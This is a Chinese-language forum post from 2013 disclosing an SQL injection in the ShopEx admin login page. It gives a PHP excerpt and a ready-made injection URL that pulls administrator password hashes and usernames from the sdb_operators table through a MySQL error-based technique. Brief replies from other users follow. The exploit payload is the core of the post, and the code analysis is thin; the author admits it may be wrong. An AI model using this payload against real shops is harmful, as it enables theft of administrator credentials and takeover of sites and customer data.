Shopex后台登录页面注入漏洞附利用POC

Jumbo · 发表于 2013-10-18 12:45:43

对登录时传递的某参数未做过滤，导致注入的产生

最近做二次开发的时候看到了登录的流程

发现在文件\shopex\core\admin\controller\ctl.passport.php

处理了验证码，管理帐号和密码，但是在最底下发现一个sess_id

function certi_validate(){

      $cert = $this->system->loadModel('service/certificate');

      $sess_id = $_POST['session_id'];



      $return = array();

      if($sess_id == $cert->get_sess()){

         $return = array(

            'res' => 'succ',

            'msg' => '',

            'info' => ''

         );



         echo json_encode($return);

      }else{

         $return = array(

            'res' => 'fail',

            'msg' => '000001',

            'info' => 'You have the different session!'

         );



         echo json_encode($return);

      }

}

没做处理。直接导致sql注入产生。还在学php，分析错的地方请指正

http://fuck.0day5.com/shopadmin/ ... login&sess_id=1

利用：

http://fuck.0day5.com/shopadmin/ ... login&sess_id=1(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1

顺带路径一起爆出来了

显示全部楼层 · 发表于 2013-10-18 12:53:07

学习了，谢谢分享、、、

显示全部楼层 · 发表于 2013-10-18 13:32:56

帮你顶下哈！！

显示全部楼层 · 发表于 2013-10-24 14:29:03

潜水是一种美德，回帖是一种责任！见贴就回，捞金币就闪。专业水金币。-----锋